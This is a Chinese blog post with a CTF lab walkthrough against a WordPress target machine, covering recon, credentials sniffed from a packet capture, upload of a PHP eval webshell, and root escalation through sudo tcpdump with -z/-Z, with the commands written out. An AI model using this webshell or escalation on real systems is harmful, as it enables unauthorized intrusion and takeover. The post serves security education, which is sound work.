CTF实践

最新推荐文章于 2024-05-01 12:43:04 发布
最新推荐文章于 2024-05-01 12:43:04 发布
阅读量548 收藏 4
点赞数 3
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51297226/article/details/111189801
版权

实验步骤

1、发现目标 ,找到的IP地址

在这里插入图片描述

2、:利用NMAP扫描目标主机,发现目标主机端口开放、服务情况

在这里插入图片描述

3、使用 Dirb 爆破网站目录。找到一个似乎和网络流量有关的目录(路径)。

在这里插入图片描述

4、若目标主机提供了HTTP服务,尝试利用浏览器访问目标网站。

在这里插入图片描述

5、利用whatweb探测目标网站使用的CMS模板。截图。分析使用的CMS是什么?

清楚看到为wordpress
在这里插入图片描述

6、网络搜索wpscan,简要说明其功能。

WPScan是一款使用ruby编写、基于白盒测试的WordPress安全扫描器,它会尝试查找WordPress安装版的一些已知的安全弱点。WPScan可以辅助专业安全人员或是WordPress管理员评估他们的WordPress安装版的安全状况。
使用 Dirb 爆破网站目录。找到一个似乎和网络流量有关的目录(路径)。
在这里插入图片描述

7、浏览器访问该目录(路径),发现一个cap文件。

在这里插入图片描述

8、利用Wireshark分析该数据包,分析TCP数据流。找到什么有用的信息?

得到登录名和密码
在这里插入图片描述

9、利用上一步得到的信息进入网站后台。

在这里插入图片描述
在这里插入图片描述
(网站管理员账号与操作系统账号是不同概念)
(由于原电脑出现问题,换电脑操作)

漏洞探测和利用

上传horse,编写horse并保存为php格式

<?php @eval($_POST['shell']);phpinfo(); ?>

在这里插入图片描述
上传之后弹出下载错误的信息,但访问horse是可以的,
路径/wp-content/uploads/year/month/xx.php
在这里插入图片描述
出现phpinfo就成功了
在这里插入图片描述
中国蚁剑连接webshell,尝试是否可以直接访问/root/flag.txt文件,结果权限不够
在这里插入图片描述
在这里插入图片描述
但在目录中发现config.php文件,发现了MySQL数据库的用户名和密码:
在这里插入图片描述

11、提权查看flag.txt

用xshell连接22端口,sudo -l查看可以用的 root 命令有一个tcpdump,可以利用tcpdump进行提权
在这里插入图片描述
构造攻击脚本,exploit,写入shellcode,shellcode为要执行的代码,赋予可执行的权限,最后利用tcpdump执行任意命令
touch /tmp/exploit
echo ‘cat /root/flag.txt’ > /tmp/exploit
chmod +x /tmp/exploit // +x 参数表示给 exploit 文件赋予可执行权限
sudo tcpdump -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exploit -Z root

用到的tcpdump命令:
-i eth0 从指定网卡捕获数据包
-w /dev/null 将捕获到的数据包输出到空设备(不输出数据包结果)
-z [command] 运行指定的命令
-Z [user] 指定用户执行命令
-G [rotate_seconds] 每rotate_seconds秒一次的频率执行-w指定的转储
-W [num] 指定抓包数量

tcpdump提权的原理就是利用-z和-Z,-z执行脚本,-Z指定以 root 用户执行脚本,从而提权

``-W1-G1,表示一次抓一个包,然后把这个包丢到黑洞里面,黑洞是dev/null`

    tcpdump是什么

    用简单的话来定义,就是:dump the traffic on a network,根据使用者的定义对网络上的数据包进行截获的包分析工具。

可以将网络中传送的数据包的“头”完全截获下来提供分析。它支持针对网络层、协议、主机、网络或端口的过滤,并提供and、or、not等逻辑语句来帮助你去掉无用的信息。
运行完毕拿到flag
在这里插入图片描述

MuXi牧兮
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
实验ctf-web题:这个看起来有点简单
Elvira
08-22 7452
sql注入,sqlmap,union,information_schema
100道CTF题目,收好了~(附答案)
m0_61568580的博客
02-28 1864
CTF(Capture The Flag),中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。很多朋友对此都非常感兴趣。正好昨天搜集到一份免费分享出来给大家看看~一定要收好了。
渗透测试-xxe之CTF考题实验及防御方法
lza20001103的博客
04-29 1507
xxe之CTF考题实验及防御方法
2024年网安最全CTF题目合集_网络安全ctf大赛题库
最新发布
2401_84264610的博客
05-01 2075
carrayjsondecodecm]):使用isnumeric函数检查数组d===false?
CTF题目合集
cgygsw的博客
01-26 2519
在给定的代码中,call_user_func_array(array($this, $this->method), $this->args) 的作用是调用对象 $this 的方法 $this->method(也就是调用ping函数的方法 也就是destruct下面那个ping函数),并将 $this->args 数组作为参数传递给该方法。反序列化之后就会调用wakeup这个函数 : 这个函数的内容 是对参数的内容进行了循环遍历 执行WAF函数的内容。
CTF实验吧-简单的sql注入3【sqlmap直接跑】
Sp4rkW的博客
07-23 5185
原理内容及连接: mysql报错注入 格式:flag{} 解题链接:http://ctf5.shiyanbar.com/web/index_3.php 本来以为和1,2一样的思路,加字符来过被忽略的关键字,结果,习惯性打个0'='0就发现这题有点不对劲 hello是什么鬼!! 前面的格式/**/,/*!*/都试了试,没效果,一个硕大的单词hello仿佛在嘲笑我,然后...
网络渗透测试 CTF实践
12-02
实验目的:通过对目标靶机的渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围,如MISC、PPC、WEB等,通过实践,加强团队协作能力,掌握初步CTF实战能力及信息收集能力。熟悉网络扫描、探测HTTP web服务、目录枚举...
test_ctf_
09-30
【标题】"test_ctf_" 是一个与网络安全领域中的 Capture The Flag(CTF)比赛...为了充分利用这个资源,初学者应该逐步学习和实践这些知识点,结合代码示例加深理解,同时不断尝试解决新的挑战,以提升自己的CTF技能。
CTF Web资料.zip
09-27
CTF(Capture The Flag)是一种网络安全竞赛,参赛者通过解决各种安全挑战来获取虚拟旗帜,这些挑战涵盖了网络攻防、密码学、逆向工程、Web安全等多个领域...通过深入学习和实践,你可以更好地理解和应对Web安全挑战。
CTF
03-15
CTF,全称为Capture The Flag,是网络安全领域中一种流行的比赛形式,旨在通过解决一系列安全挑战来提升参与者的技能和知识。...Python在CTF比赛中扮演着...通过实践和不断挑战,参赛者可以在CTF竞赛中取得更好的成绩。
安恒ctf misc crypto 培训资料合集
10-06
【安恒CTF Misc Crypto培训资料合集】是一份涵盖了加解密技术、RSA...在学习过程中,理论知识与实践操作的结合至关重要,因此,建议不仅要阅读PPT和PDF文档,还要尝试亲手实践相关练习,以便更好地理解和掌握这些概念。
CTF 隐写术经典例题讲解
10-22
该内容为CTF赛题隐写术经理例题讲解,包含图片隐写,流量分析,文件查看,文件分离,加密解密等多种题型讲解,图文结合,适合新手学习。
CTF题库—(实验吧)之Decode
qq_37992321的博客
11-28 2044
版权声明:如果对大家有帮助,大家可以自行转载的。原文链接: 1.打开解题链接: http://ctf5.shiyanbar.com/crypto/Readme.txt 得到:0x25346425353425343525333525343325366125343525373725346425353125366625373825346425343425363725346225346625353425...
ctf题库--FIVE1
miko2018的博客
08-21 2464
&amp;lt;题目&amp;gt; 图片内藏有5位数密码,你能找出来吗? 解题链接: http://ctf5.shiyanbar.com/stega/FIVE1/1111110000000000.jpg &amp;lt;解答&amp;gt; 根据链接可知这是一张图片、而且一定不是个简单的图片,让我们将文件下载下来。 ※打开发现是一个表情。接下来在Stegsolve中将该图片进行分析,列表中出现了一个格式为JPEG的文...
Javaweb安全——反序列化漏洞-CC&CB链思路整理
weixin_43610673的博客
10-28 2320
如上图所示基本上起点终点就是那几个点然后相互拼接:《Shiro RememberMe 漏洞检测的探索之路》中Koalr师傅已经对CommonsCollections 系列 gadget进行了提纯变成以下四条对命令执行部分的调用分别为InvokerTransformer调用TemplatesImpl对 commons-Collections4 的适配则直接用替换。
CTF实战实践
weixin_46660023的博客
12-05 5195
文章目录前言一、什么是CTF1. CTF竞赛模式2. CTF各大题型简介二、CTF实战1.nmap扫描2. whatweb探测3. Dirb爆破4. wireshark分析5. 利用漏洞提权6. SSH登录服务器总结 前言 今天做了一个CTF实践,对目标靶机进行了渗透,以此了解CTF的实战过程。 一、什么是CTF         首先先来介绍一下CTF。         CTF(Capt.
ctf web本地管理员
god_001的博客
03-05 1441
启动场景,发现是一个登陆网页: 查看网页源代码, 发现最下一行疑似使用了base64加密 解密后果然,得到一串字符:test123 测试管理员账户为admin,密码为test123,得到 再联系题目,可知需要使用本地IP登录, 使用bp抓包,send to repeater,头部添加 X-Forwarded-For:127.0.0.1 发送请求得到结果: X-Forwarded-For X-Forwarded-For 是一个 HTTP 扩展头部,用来表示HTTP请求端的真.
实验CTF实践
qq_56472016的博客
12-07 3068
实验目的:通过对目标靶机的渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围,如MISC、PPC、WEB等,通过实践,加强团队协作能力,掌握初步CTF实战能力及信息收集能力。熟悉网络扫描、探测HTTP web服务、目录枚举、提权、图像信息提取、密码破解等相关工具的使用。 系统环境:Kali Linux 2、WebDeveloper靶机来源:https://www.vulnhub.com/ 实验工具:不限 实验步骤和内容: 目的:获取靶机Web Developer 文件/root/flag.txt
CTF密码学基础与编码解析
"CTF密码学CRYPTO.pdf" 在CTF( Capture The Flag)竞赛中,密码学是一个关键领域,涉及到编码、解码、...通过对这些知识点的学习和实践,不仅可以提高在CTF比赛中的竞争力,也有助于提升个人在信息安全领域的专业素养。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值